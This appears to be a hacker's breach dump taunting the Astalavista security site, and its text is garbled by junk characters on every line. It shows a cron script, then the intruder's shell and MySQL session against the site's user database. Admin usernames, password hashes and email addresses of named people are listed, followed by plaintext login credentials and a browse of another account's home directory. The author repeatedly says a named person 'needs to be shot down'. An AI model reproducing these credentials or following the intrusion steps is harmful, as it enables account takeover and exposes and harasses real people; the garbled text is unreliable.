1 h- ]6 ~+ H2 P |: Q- s8 d <title>ASTALAVISTA.com - Exploits</title>% T# r% a h `
<link>http://www.astalavista.com/exploits</link>7 t3 g8 q. {; X5 \* N' J+ D: W
<description>All availably Exploits.</description>; @: a% T8 [ u: F5 w# }4 Q' K6 ^; h
<language>en-us</language>( P9 M, @" e! _
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate># r% z. e8 Y& Q# F6 Z( ^, W% l
<docs>http://blogs.law.harvard.edu/tech/rss</docs>* B" @# |( ?+ f/ A- L( h7 W
<generator>Astalavista.com</generator>
9 i m& [6 ]. A, i <webMaster>info@astalavista.com</webMaster>’ . $items . ‘; C7 ~$ p4 U0 D+ R; g6 z
</channel>
; ^: s7 O! P, S# F</rss>’;
2 h) L4 h+ R) m/ _; y: D/ ?
5 p& G0 c8 I+ T. @ if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
/ n! N# R& o+ x# `" N unlink (FULLPATH . ‘/feed/exploits.xml’);
( u) w0 K7 T; ^7 e% V }
$ |3 Y3 G1 r7 R2 K6 Y( J2 d/ Y% f+ V8 `
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);, o* J% m4 @% _- I+ S
[snip]+ Z+ N# h) _' m5 B8 B
1 `8 ~2 @6 c% {7 y' u
sh-3.2$ cat exploits.sh
9 j; R/ P. b+ C9 a \' j2 M#!/bin/sh
5 M7 \: w+ p8 ?0 ~: J& T* t
1 ~4 ^' T# N3 j+ _# {2 \) U###########################################################3 n1 ^# s) V5 o; R
# #7 m3 d+ e6 R& Y/ q1 }$ A) H; I
# Title: milw0rm exploits adder #
- ~0 f. a( F8 V( L( l# Description: Add all milw0rm exploits to the #
- }0 J2 N/ j6 X+ v2 u+ f. W4 H# Astalavista.com database #
8 ]8 `9 g3 h! h2 o# #3 ^) ^ C4 w0 [) Y, a! s: K, I7 o
# Company: Astalavista Group #
, I3 f& e2 i6 x2 U# Author: Paulo M. Santos #
M8 w9 |/ S3 |% E1 _4 F+ {$ \; G# S# E-Mail: 链接标记paulo.santos@astalavista.ch #
- ^" e1 L2 U) G# #& m k9 I/ d6 Z4 o
########################################################### e6 ]/ |0 q" C/ y
) w% H! d. G3 r( f0 o" X3 z
# path
]* M$ d+ a- S% j$ T3 |4 Uthis_path=/home/com/public_html/modifications/cronjobs y" \& k% M. L
2 s! ?% l& p9 i; S# h6 {+ y# A: o# change directory
" h6 _9 G3 Z$ v5 g: K% _* _cd $this_path
* D% R4 \2 z! m$ x, Qcd tmp/
6 x9 s2 ^* [ ~# N u8 @( Y( t
) J. S& k# L: {) r/ R4 ~5 G) E# delete files
: U" |4 ^; X/ _' E f3 ~& W5 v" v4 srm -rf milw0rm.tar.* &, W9 a. ^3 h+ \; o( z4 |
rm -rf milw0rm/ &
% i( a! V& W' b8 f+ s8 s# d3 [9 F0 d1 ^, _+ Z K
# wget milw0rm paket, s; W5 d* P& @' y$ D
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]! ^, ?; {5 B# J8 ~/ M' C4 F
: \$ {" f# U/ I- ?# extract milw0rm paket
8 R4 S; }5 Z# h# D5 v4 L& r& X; z; x! ztar -xvf milw0rm.tar.bz2
+ i9 b8 d* t0 n( N$ h3 a9 o
+ {; P" F4 d7 r7 L: X# change owner
5 v8 i8 `% }$ Qchown -R com .0 B9 [2 G) V: a% Z
chgrp -R com .6 n. Q8 |6 H. n2 _
/ v' J8 D: C& e# G2 H* U- |6 p
# execute php script
3 v2 O7 G* E! L2 H9 Q( k7 Ocd $this_path! i; g+ ~0 o( W2 D
php -q exploits.php1 y$ _+ a2 \% o: O9 t
- W5 q: w+ ?6 |: }! g# delete files ]( R& {/ U7 b
rm -rf tmp/milw0rm.tar.*
9 h! Y6 Y7 d+ J3 ~rm -rf tmp/milw0rm/( r. L* Y0 r5 ^" n
5 \0 U8 M" _7 r/ H& F) e9 ~
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”' z. c4 R- `2 P% V/ v% r
Paulo M. Santos needs to be shot down.
) {2 `4 E( X3 c! |! \; n( v7 L$ V% \, L9 i, x
mysql -u contrexxuser2 -p
! s6 K& M: W! x; ]6 LEnter password:
9 w- w6 f* q) w. H, t4 nWelcome to the MySQL monitor. Commands end with ; or \g.
, g4 e( o- V9 w$ p$ o4 RYour MySQL connection id is 2616944 N z* x6 E! W9 _! h
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
% P8 y9 t5 p( C$ j6 S& Z3 `8 j4 Z. l9 d
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
' R# I. T: z- w0 ]) o/ s! J: D% K+ Z% z% g0 O5 w5 T
mysql> show databases;: s# A+ H7 s2 D8 l: P
+——————–+: }1 G* @3 z( o; t
| Database |2 b) v2 L5 a) c# B7 t
+——————–+0 ]) U4 Z( z2 I# S2 [/ Q" z
| information_schema |
) t! E5 } `* ?5 g0 {9 z| com_contrexx2 |! Y [& L9 a$ p' P! u( \* L
| com_contrexx2_live |
% H8 T- Y! Y ?% A: p( z5 E| test |" c9 s/ I9 z% J4 o
+——————–++ I: ?+ X3 t& i3 d) I2 ~
4 rows in set (0.00 sec)( o/ ?+ P- R! m! r
! v4 k1 a% B) n7 f
mysql> use com_contrexx2_live
+ X* V3 [. n9 ~Database changed( q/ K7 h( Z! f
mysql> show tables;
! ]* a1 P) Q4 f* u+————————————————–+
2 p* X& K& Q& M$ r% m' M5 y| Tables_in_com_contrexx2_live |/ p0 B( Y+ K" V
+————————————————–+
3 X/ @+ A. {8 H+ E# N5 u% t| cc_banner_counter |# b& n. X1 ^7 s7 W- X. L
| cc_search_counter |6 e! Z/ A* N9 ~' b, k1 I
| contrexx_access_group_dynamic_ids |0 d% J- l9 w$ y* `! G4 ^7 S
| contrexx_access_group_static_ids |9 R0 q; [8 p" _! z' n
| contrexx_access_rel_user_group |2 Q: s' t- z- Z% z! G6 K* a( P) x
| contrexx_access_settings |4 H# L! `5 |! E$ h2 f! g& M' t( T1 A
| contrexx_access_user_attribute |
4 z% j ], t7 Q7 o| contrexx_access_user_attribute_name |) g/ K( T" L: p! ^: {
| contrexx_access_user_attribute_value |
+ |/ j* |3 c& p+ ?( D" I j7 U| contrexx_access_user_core_attribute |
. F; E! l$ q; z( N" j- ~5 k| contrexx_access_user_groups |4 r7 a3 f+ C8 B2 k4 n. R
| contrexx_access_user_mail |! R0 G/ |/ N: ]/ M+ e
| contrexx_access_user_profile |7 j! v" c. i" \9 s5 ^$ z$ F2 q2 z
| contrexx_access_user_title |
3 w& h6 Z/ ?) U/ m, x| contrexx_access_user_validity |( f( k3 R' D: Q% u/ Z" V3 ^6 |. R8 ~
| contrexx_access_users |
; `5 e4 w z9 t* y- v2 L4 t2 Z) o m4 F| contrexx_backend_areas |
7 Q+ v7 I" U: ]' N% ^2 ?| contrexx_backups |
q, K: C4 K9 Z: B4 R: f| contrexx_content |* I6 ?/ V& W: i( I, ~) k# }8 C
| contrexx_content_history |! B; G( c- A: \5 P
| contrexx_content_logfile |/ l! S2 w1 H' L, w
| contrexx_content_navigation |
; f9 p3 G" K0 `! {) u% u5 e0 F| contrexx_content_navigation_history |) M4 E3 } i1 b2 ~. i
| contrexx_ids |
$ S/ n. V. C/ ^8 ^6 J, J7 i9 K3 G| contrexx_languages |' g1 {9 X% p O2 e. L" x% V
| contrexx_lib_country |
7 l! r* ?$ P1 T| contrexx_log |
$ J1 [; W' v$ S- ~, o# [4 T% q/ k| contrexx_module_alias_source |
, B& V8 b* Z& c1 e! a& H| contrexx_module_alias_target |
$ e4 r- a6 H1 Q| contrexx_module_block_blocks |
. p" c" H* H4 C* r3 L5 ]3 j| contrexx_module_block_rel_lang |. l8 U# x2 k" \+ ~! J
| contrexx_module_block_rel_pages |/ E% P2 B X1 |% c
| contrexx_module_block_settings |
1 ~+ R- D9 C8 L5 z4 j" P| contrexx_module_blog_categories |, E% w$ z4 V5 n
| contrexx_module_blog_comments |
" U, m3 N& T4 N2 C# r| contrexx_module_blog_message_to_category |# }0 Q2 V- ~! Z; Y
| contrexx_module_blog_messages |' d) }/ A. R1 y& D( A# W
| contrexx_module_blog_messages_lang |! O" ?: b' G1 s
| contrexx_module_blog_networks |
" Q: Q0 f- Z8 _) ]0 j| contrexx_module_blog_networks_lang |4 d& c: e& Q0 f' H
| contrexx_module_blog_settings |
$ P& ?+ ]' ^/ }1 P" j* e* T| contrexx_module_blog_votes |$ q$ Z* B: s0 n) f4 V7 b; G5 {; z
| contrexx_module_calendar |
$ M; Y. x `2 [# w| contrexx_module_calendar_access |) f% o7 b: Y8 [
| contrexx_module_calendar_categories |
5 F: x4 M1 b8 O/ q4 \2 {0 ^9 ~6 r| contrexx_module_calendar_form_data |" ]) h) Y" a- K$ F
| contrexx_module_calendar_form_fields |
* {* W2 c# |8 J; N" z/ G3 T$ F2 _| contrexx_module_calendar_registrations |0 c9 J, X% f; S7 N
| contrexx_module_calendar_settings |
* U7 @' Y! J) z Z2 h| contrexx_module_calendar_style |
, l# H9 d9 u h7 k, P r" l# O| contrexx_module_contact_form |
2 c1 k+ ^5 |2 u3 F; w| contrexx_module_contact_form_data |- V0 \* b# e0 B% x
| contrexx_module_contact_form_field |
* Q& J# l7 s% e) W% p) L| contrexx_module_contact_settings |
/ ~1 g% z/ \# P9 M/ @- C E6 `4 G6 _| contrexx_module_data_categories |! J, b) S3 Q y
| contrexx_module_data_message_to_category |
: g( j# X+ @! g. i; R| contrexx_module_data_messages |
2 G3 r g- l1 U& d9 E: Z9 I% y" T| contrexx_module_data_messages_lang |! t' {( C( {/ G5 ^9 J% o. @
| contrexx_module_data_placeholders |) M; Z, a' P) T
| contrexx_module_data_settings |& D/ S: S9 w) ?- |+ c
| contrexx_module_directory_access |
* r! W# b0 _! n1 l0 V; R| contrexx_module_directory_categories |
. v- R* i* E' A" B| contrexx_module_directory_dir |
9 V* J3 R+ K+ s3 z# _| contrexx_module_directory_inputfields |1 c' Q% N6 N, ?. J; x3 @) ?6 g9 S) O
| contrexx_module_directory_levels |6 @3 S& D5 v6 k1 W9 \
| contrexx_module_directory_mail |
# s1 n3 m! E' j0 L| contrexx_module_directory_rel_dir_cat |# k; U% r/ b8 O6 I; r, K0 S8 U- }0 s
| contrexx_module_directory_rel_dir_level |
6 t8 E; g; R3 j* @| contrexx_module_directory_settings |7 n& R6 ?% v6 m' W: Q+ y
| contrexx_module_directory_settings_google |
9 B: B& |. g: j, K| contrexx_module_directory_vote |) X$ U% k: h2 _8 k% L
| contrexx_module_docsys |
/ ~( u9 a3 \2 t4 j! W2 E, Q| contrexx_module_docsys_categories |: b2 h7 B- }- d3 q1 p2 g
| contrexx_module_egov_configuration |
/ f) G$ ~! Y6 n5 }9 f| contrexx_module_egov_orders |
f/ c6 Q: E9 ?) X1 {| contrexx_module_egov_product_calendar |) p; H- }5 l7 p
| contrexx_module_egov_product_fields |% W& y! }8 T* s/ N9 }. ]0 `2 P e& Q+ ]
| contrexx_module_egov_products |2 R6 a+ N. H( r/ y
| contrexx_module_egov_settings |% W. Y- _& {2 e/ C5 U/ J) W4 u
| contrexx_module_exploits |
/ }/ X" m$ c/ c3 U& a| contrexx_module_exploits_categories |
, u) h0 [5 b1 i6 I) Z| contrexx_module_feed_category |' |. G2 A$ R g2 F. F
| contrexx_module_feed_news |
* ~" P: {5 z ]8 q' c/ {| contrexx_module_feed_newsml_association |3 Q) L$ n8 Y; E0 P7 S3 v3 B/ M5 C9 k
| contrexx_module_feed_newsml_categories |
+ p" Z. v( k3 Q, H* P+ l6 Y0 j4 Z| contrexx_module_feed_newsml_documents |
2 U6 c' {1 U; R4 M| contrexx_module_feed_newsml_providers |
+ j: o1 A. J% X- k* z2 D| contrexx_module_forum_access |1 B1 h. z" m" Z1 K9 G# x4 g8 ?/ M3 P
| contrexx_module_forum_categories |& a# h j0 l- ?* x* m1 G
| contrexx_module_forum_categories_lang |/ v e9 j1 P+ X
| contrexx_module_forum_notification |1 E7 a% e( b& [3 Y
| contrexx_module_forum_postings | e% M( C5 ~# d6 A# z
| contrexx_module_forum_rating |
5 N. W) n, ~# n( W/ V: d| contrexx_module_forum_settings |- n! w8 F1 V( b. b
| contrexx_module_forum_statistics |
9 o( U# I# E1 }. n+ z2 @6 j- D| contrexx_module_gallery_categories |- P% n+ ? K3 ^7 K
| contrexx_module_gallery_comments |
4 M$ G8 A# z2 ~| contrexx_module_gallery_language | y, B$ K( _' R1 d7 W# D. j
| contrexx_module_gallery_language_pics |& b$ ~/ X' W" @$ H
| contrexx_module_gallery_pictures |" y0 i' E+ N( \% u% z
| contrexx_module_gallery_settings |7 d o# Z2 R5 c/ ]4 C' g+ ~( Z
| contrexx_module_gallery_votes |( E, W2 r$ c9 T& E$ b+ l
| contrexx_module_guestbook |
2 h& v$ j) s7 F0 }* ]6 g| contrexx_module_guestbook_settings |7 H9 X% F' i! h% F$ L3 Z+ D
| contrexx_module_livecam |
- u5 }3 K7 A' N! E' ~* ~$ M| contrexx_module_livecam_settings |! T4 U( R/ y U; t( {
| contrexx_module_market |
, t9 I# d9 C, p* d# n; ]6 X6 \| contrexx_module_market_access |( Q9 A% h. U1 \2 G K9 G0 O
| contrexx_module_market_categories |! i G0 s/ V* j+ A
| contrexx_module_market_mail |
% B: t" n# f5 M V1 n8 e| contrexx_module_market_paypal |2 W n) O3 \2 I, a0 y
| contrexx_module_market_settings |" @% _+ `1 W8 V3 h) w* F; W- |* t. g- r
| contrexx_module_market_spez_fields |
" L" _; I ^% b( T! T* Q/ e$ o% k4 T| contrexx_module_mediadir_access |
8 y! I- f2 \. Z9 H| contrexx_module_mediadir_categories |
0 ] X# m; `/ q# y- }2 F| contrexx_module_mediadir_comments |7 S. w% g4 V4 Q0 G4 {
| contrexx_module_mediadir_dir |
$ t8 e8 |/ H! @; d; R. l| contrexx_module_mediadir_inputfields |( N+ C" r+ L& @- `) \ k4 p, R
| contrexx_module_mediadir_levels |: ?1 w3 r/ z2 g' Q- Q
| contrexx_module_mediadir_mail |" h' H" ^1 w1 o8 ~1 j2 M' V* o
| contrexx_module_mediadir_rel_dir_cat |5 M/ k! Y2 N; t; }% H5 v. f# P7 U: D
| contrexx_module_mediadir_rel_dir_level |, W- w! W' I1 U; `5 n
| contrexx_module_mediadir_reports |
3 _- a$ r- K& Y; I8 Z Z| contrexx_module_mediadir_settings |, C5 s( V3 F8 a; G
| contrexx_module_mediadir_settings_google |
9 P0 ]. l8 Y* f% A: b* b! \| contrexx_module_mediadir_vote |9 B: T' i1 _7 [& U! C8 L) G2 z2 O
| contrexx_module_memberdir_directories |
' B" }, n/ q8 z2 f2 n$ z# x' W| contrexx_module_memberdir_name |: S V/ G$ l6 j, Z/ F9 k2 a
| contrexx_module_memberdir_settings |
/ q0 ^; V7 O& r3 r& h: ]| contrexx_module_memberdir_values |
3 |& r8 l/ b& d! r' @| contrexx_module_nettools_allowed_groups |/ ]5 L3 w6 q8 j. u
| contrexx_module_nettools_settings |; R# u! W+ ]) v; y
| contrexx_module_news |
6 w9 j3 B K8 Q$ Q8 e* L3 I| contrexx_module_news_access |
) m) `3 \, t. T| contrexx_module_news_categories |
4 i2 w |7 z j5 K5 }| contrexx_module_news_settings |9 t5 i! o8 q. P4 u7 f
| contrexx_module_news_teaser_frame |% A' [' i, U3 Y Y
| contrexx_module_news_teaser_frame_templates |
6 ~2 v5 j3 ^" ]| contrexx_module_news_ticker |6 w% Y$ n V; z' f/ N6 u
| contrexx_module_newsletter |; ]3 B7 O( J6 S- _% y" p
| contrexx_module_newsletter_attachment |
3 s# I+ J0 N! y| contrexx_module_newsletter_category |5 p, r; z0 `- S
| contrexx_module_newsletter_confirm_mail | `* R% X9 o& j
| contrexx_module_newsletter_rel_cat_news |
8 Y9 j0 F" R6 G7 P% |1 ]( K| contrexx_module_newsletter_rel_user_cat |
. [) n/ C' T, b, U# a4 m# `2 B+ f/ R| contrexx_module_newsletter_settings |
. f' l( l$ f' J2 y" W6 ^| contrexx_module_newsletter_template |" t t5 Q6 u! C& k9 H* X5 N7 D
| contrexx_module_newsletter_tmp_sending |0 [, Z# Q8 K. h0 l) U! M2 V: H7 Y
| contrexx_module_newsletter_user |
0 R; T4 w b+ n* @, i| contrexx_module_newsletter_user_title |
' F" h/ F4 `7 M# h' O| contrexx_module_onlinetools_defaultports |" f& e; v) B8 Z3 ?
| contrexx_module_onlinetools_defaultports_back |% z" K% {1 c, \4 A
| contrexx_module_onlinetools_geolitecity_blocks |
* m9 v1 I# s" N- R3 n0 D, W( G| contrexx_module_onlinetools_geolitecity_country |
. o* O: L0 \4 N| contrexx_module_onlinetools_geolitecity_location |. F) H8 h3 p& a+ K; _
| contrexx_module_podcast_category |' U: G7 \/ J- X# Y5 B/ N# U
| contrexx_module_podcast_medium |3 P6 Q3 T3 t* ~
| contrexx_module_podcast_rel_category_lang |) g$ c, B$ ^" I: s
| contrexx_module_podcast_rel_medium_category |8 ~3 ]; T! M/ U8 T$ u; b
| contrexx_module_podcast_settings |
. b% F- F4 e' p5 ~$ k4 D6 k| contrexx_module_podcast_template |
) M* k5 O6 M4 P. p| contrexx_module_proxydb |5 ^( Y b% B: S. U. U- R
| contrexx_module_recommend |
* Y4 Q8 u( }& _* c& j% v& C| contrexx_module_repository |0 x+ ^/ S- Q( J" z) p( j" {
| contrexx_module_securitynews_cats |( }" }" G- J$ l5 f' ^& c, ]( D9 A
| contrexx_module_securitynews_feeds |
7 O" M7 r; l. Q9 L" D5 _| contrexx_module_securitynews_news |
) `, C. C3 h6 \| contrexx_module_shop_categories |/ o( S/ U1 }9 z
| contrexx_module_shop_config |: X* F6 \, D @2 _
| contrexx_module_shop_countries |- e9 d2 W% a" s
| contrexx_module_shop_currencies |, B# p/ y( I- ~# I' _/ @8 {: m
| contrexx_module_shop_customers |( B4 ^% E- u: S$ z! }. U+ q4 @! G
| contrexx_module_shop_importimg |7 j& P& j- K) N/ ?
| contrexx_module_shop_lsv |1 @& A; k2 g+ D8 ? ?! P% o
| contrexx_module_shop_mail |
+ S9 t: G- F/ F6 m- f7 b V| contrexx_module_shop_mail_content |
5 ~$ ^ r6 O o& t# d| contrexx_module_shop_manufacturer |9 w9 |' e6 E: S6 N1 R2 p- _
| contrexx_module_shop_order_items |
/ h) h: _. o# N| contrexx_module_shop_order_items_attributes |
' v- l& s! B6 d+ T. N: i* X2 P+ w| contrexx_module_shop_orders |% I0 \2 N! v6 U
| contrexx_module_shop_payment |7 ~- _2 h" G9 S
| contrexx_module_shop_payment_processors |) ]5 C' Z1 U n g; E3 y
| contrexx_module_shop_pricelists |
! l$ B3 W6 U; j# l| contrexx_module_shop_products |
1 a4 {+ f4 i& X- X# o& r8 U| contrexx_module_shop_products_attributes |5 [* X, ~- o! q' t: S2 J- l
| contrexx_module_shop_products_attributes_name |9 I5 @- U X& j0 E
| contrexx_module_shop_products_attributes_value |
6 Q, O Y% ~7 X, C# Q; c| contrexx_module_shop_products_downloads |+ N- F. M% Y' G k0 Q% a
| contrexx_module_shop_rel_countries |8 e- A% ]2 ^3 J7 ^# A9 |
| contrexx_module_shop_rel_payment |# O: S* D: r1 S: e) z, v$ A P/ [) P
| contrexx_module_shop_rel_shipment |
" T1 j0 d! Z' [9 k| contrexx_module_shop_shipment_cost |
2 X$ x% g7 d3 x+ E6 u( Q* C| contrexx_module_shop_shipper |
' x! t y2 w3 Z1 X1 k% I& z# m| contrexx_module_shop_vat |
$ y3 l+ s4 d5 Y _& l- W/ T| contrexx_module_shop_zones |. M) x9 u0 t% m* E }. |
| contrexx_module_u2u_address_list |
, L3 W1 ]/ T. ]1 Y6 ^; p| contrexx_module_u2u_message_log |
4 q W3 a# c* r, h/ B, d5 ]| contrexx_module_u2u_sent_messages |7 U& q1 ]' `- T, J" d. M3 Z; s
| contrexx_module_u2u_settings |
6 i# l Y2 q1 c& Q( V/ c3 J| contrexx_module_u2u_user_log |* {2 C. W: l: K i9 {
| contrexx_modules |( z& | g* c# z) J' t6 y# W
| contrexx_sessions |
1 h/ E) h* E- _; K9 B0 |1 G| contrexx_settings |
" C% O8 q4 x0 U+ T0 w| contrexx_settings_smtp |5 J7 z4 p( L" } g' t* E! R
| contrexx_skins |
2 C' }" i, D0 H6 o: l| contrexx_stats_browser |$ }- R F- |; J+ {. N' E
| contrexx_stats_colourdepth |
. ~! r/ Z" i) W, g% m- R0 u| contrexx_stats_config | ]- w& X, k+ Y0 s* \1 f0 H
| contrexx_stats_country |
9 [5 h" a3 D3 U/ L$ x P$ W) I$ }| contrexx_stats_hostname |
) u& ]5 O" _3 {' P| contrexx_stats_javascript |
9 ?1 u" N: _: [ y" C* U* G$ `| contrexx_stats_operatingsystem |
: Q' d2 b9 @- S0 I- ~/ B$ ]9 u| contrexx_stats_referer |
$ q, U2 D6 ]$ u/ C* Z" ^) y+ F! D| contrexx_stats_requests |0 t* T( ]+ K1 X. H& O2 }
| contrexx_stats_requests_summary |
) \$ k9 k7 l% t% F| contrexx_stats_screenresolution |7 U N- T3 e/ f" u3 j' H
| contrexx_stats_search |
1 J0 u- @5 {& f! Z! b! T| contrexx_stats_spiders |
! v; C h1 U& `6 E: |( g2 F| contrexx_stats_spiders_summary |
; e" _) S# P# Y3 t| contrexx_stats_visitors |, r" e, F, h4 w& F) O
| contrexx_stats_visitors_summary |# j# W+ V$ Q3 H, T: ^/ a9 S* D
| contrexx_voting_additionaldata |% `* G& N2 m* }7 q$ q
| contrexx_voting_email |
B' v4 R6 N: L7 g5 F| contrexx_voting_rel_email_system |# p- G; C4 U6 S, W+ w
| contrexx_voting_results |
5 W4 _+ y N7 z7 i& W& b| contrexx_voting_system |
# _4 l. z7 J5 ~5 l- N# b| foo |! n3 E! M( I8 i F! f
+————————————————–+
0 Y( M7 u. x x0 X- A I227 rows in set (0.01 sec)
7 L! J( \ G& G1 g' x& }! s& u
2 a: A4 T' Q( {/ V' ^mysql> select count(*) as skids from contrexx_access_users;3 d, K) \0 d. g+ c0 ?. [9 Q6 \
+——-+
/ g, D/ G [7 ~0 R; { X- W P* O| skids |) u+ K$ y6 [" d$ G$ X
+——-+0 L" a3 M+ ?9 e% I
| 53699 |
$ z3 F; Z3 q# p: `' d1 I+——-+
! O# B5 D. O& h1 row in set (0.00 sec)
3 X! s9 p9 R3 ?, s* e4 [! H: d9 E1 M( E; W, `) ~4 w' w5 P% S( `, e
mysql> describe contrexx_access_users;2 v% U# V; }% E7 \# I% J
+——————+——————————————+——+—–+————–+—————-+
8 W+ A9 \9 X5 e$ k| Field | Type | Null | Key | Default | Extra |( {% M+ [* w6 H/ r0 a
+——————+——————————————+——+—–+————–+—————-+7 j. I) z! I8 ~9 u3 _ Z; z
| id | int(10) unsigned | NO | PRI | NULL | auto_increment | A; Q* m9 ~) E, X8 m
| is_admin | tinyint(1) unsigned | NO | | 0 | |
& u% d8 C. ~% D) g% C| username | varchar(40) | YES | MUL | NULL | |6 \! J" h$ p7 ^
| password | varchar(32) | YES | | NULL | |
7 X) n# v7 R: o: _| regdate | int(14) unsigned | NO | | 0 | |/ d2 Z& R) g. t
| expiration | int(14) unsigned | NO | | 0 | |
2 Z: M8 G3 {* t, z| validity | int(10) unsigned | NO | | 0 | |) m: G9 O- ^+ I
| last_auth | int(14) unsigned | NO | | 0 | |, M$ ~; }0 O9 o3 e; |4 M6 g% v9 a
| last_activity | int(14) unsigned | NO | | 0 | |# v1 f" @; ]2 V4 T1 V. U2 b
| email | varchar(255) | YES | | NULL | |5 e' m0 H# o% |6 H1 o
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |' n: g8 R" W" C6 E
| frontend_lang_id | int(2) unsigned | NO | | 0 | |8 w+ r5 x, ]2 S6 L$ x. l! P/ K
| backend_lang_id | int(2) unsigned | NO | | 0 | |
' z- m3 P' a( e( ]' N) ^| active | tinyint(1) | NO | | 0 | |
5 @% s7 Q& o+ V& u* h| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
4 o1 b+ O _: T' B; z! N( z4 }) }| restore_key | varchar(32) | NO | | | |
; ?) y9 _, s+ || restore_key_time | int(14) unsigned | NO | | 0 | |) |0 o$ V7 H! H2 z
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
( A+ G: R5 J" ?$ l+——————+——————————————+——+—–+————–+—————-+( {/ f P( b4 P* L8 s
18 rows in set (0.00 sec)6 c+ i" _' p9 H6 \7 c- t, n5 D; F" ?
! @# v7 U& v' K7 @- k% D: ?8 \mysql> select username,password,email from contrexx_access_users where is_admin = 1;3 L' G: _' Z1 ?: X$ B; h
+————+———————————-+—————————–+# q4 r% u4 _4 }
| username | password | email |: u, W; c" T2 B) K7 ?4 `; ?) X
+————+———————————-+—————————–+' T3 [' ^) N& T
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |/ F5 ?/ b# z6 S* {: G8 ^
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
- B1 X- K7 q, b3 ~| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |6 x0 ^$ k: l/ w) C( r+ b8 p2 r
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |8 \* k$ }& n9 f0 ]" h
+————+———————————-+—————————–+/ A6 o) U( u% z# R; h( ~8 n
4 rows in set (0.04 sec)
* g/ X0 i7 ?+ H; _
7 @% `; p2 y5 \. A Hmysql> exit;
5 Q- J8 @- O1 D( j) kBye
6 a+ F) c% K t/ g- R
l1 `- [; M0 ^ R, l[~] There you go, your “team of security and IT professionals” is a joke.7 A X8 c- P6 a7 u8 n
- z+ w; {4 Y: `. L1 A+——————————+
: M( t. M7 S0 w) W: N: Ksystem:f82BN3+_*
- l# `3 l* ?% D/ M$ i$ h& _1 xBe1er0ph0r:belerophor4astacom1 |8 d2 \1 G# {& O8 y% J v
prozac:asta4cms!) E) U& t8 E1 R% h8 `. ~$ V
commander:mpbdaagf6m) J; R8 q) t* g: u/ _. K4 w8 [( j
sykadul:ak29eral9 n' f6 t/ z3 j! H
+——————————+
% P- V* i9 c* ]7 [7 S( B; ^& ]( C5 @' n! n! U$ a0 e, {6 b
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
" W, e z+ k% N. w…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.& H' M; r% x. Z I5 U( n
; d4 j) l9 I. Q5 f- J. W
[~] Lets move to astalavista.net now,5 F, v7 a3 a7 | a u1 L2 F4 h. \
& E3 J5 C d# y- P! ]
From <链接标记[url]https://www.astalavista.net/[/url]>:; d& f8 I. k* n6 r0 t
>> Everyone knows that the best defense is a good offense.8 n |9 P& `% }
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.( L! I. h) j1 h Z/ M6 q) m+ G- {1 D$ n
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
/ `6 W' I7 j' E* h1 h3 q>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”4 t( f" B$ L9 I8 K. |; k5 {0 q% I
$ ^% B# d( c7 B K>> Go ahead, try and hack our server . in a completely legal way!
; @- y# j8 y$ e" `/ M9 D>> Learn by doing: We offer our members tricky tasks and challenges on an
8 ^- Z3 z* R. C$ M3 H9 m>> ongoing basis so you can test your knowledge and abilities. You can also
% m1 X8 G% T- h7 g>> demonstrate what you.ve mastered by taking part in regular hacker contests
I+ d" R( y; G: |: @/ }>> and war games
4 Z9 f% M0 K Z) k* Z! W0 T4 Y; s9 q0 }
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
! A/ C$ D0 t& N/ N$ b/ v
4 {9 C; k+ N9 A7 L$ s6 j" M- W[-] Tricky task: Find home dir of astalavista.net) P4 m% n* Z n h1 u2 h' u
6 p9 D& g e/ j; x7 W
sh-3.2$ ls -la ~astanet* ?0 a- w5 _6 n
total 48
$ x$ [+ K! I& [: c6 @% d8 pdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .3 f7 l: n# M- p) j$ N. m
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..' O, k4 m- V+ j7 O. T3 v" G1 v
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth6 z% R" [+ K/ E! F" l
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
/ F, W. K4 V) \-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
- s8 R5 U% o" ?5 G& ^-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile9 u! Y+ s a$ x- W
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
& p4 Z$ v* ~, ]7 R. ?9 Sdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
' V- k+ n% b5 I; ydrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
$ U8 q9 P# @5 g+ ?# f, H) {2 Y& e) {drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail+ Q1 [6 X* N* O( ]8 b2 m
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
) a; \$ {0 b |4 g* Q-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
. S3 K1 y$ y7 b* ^4 T
6 h3 F( o( N5 _9 T( C4 Qsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/; k6 z7 |* H3 m' _9 H5 Y
sh-3.2$ ls -la$ I4 E: b2 M: A& S6 W
total 200
, M% D4 [" K& D% z% C0 `drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .; i: _8 {( V* K! M/ G
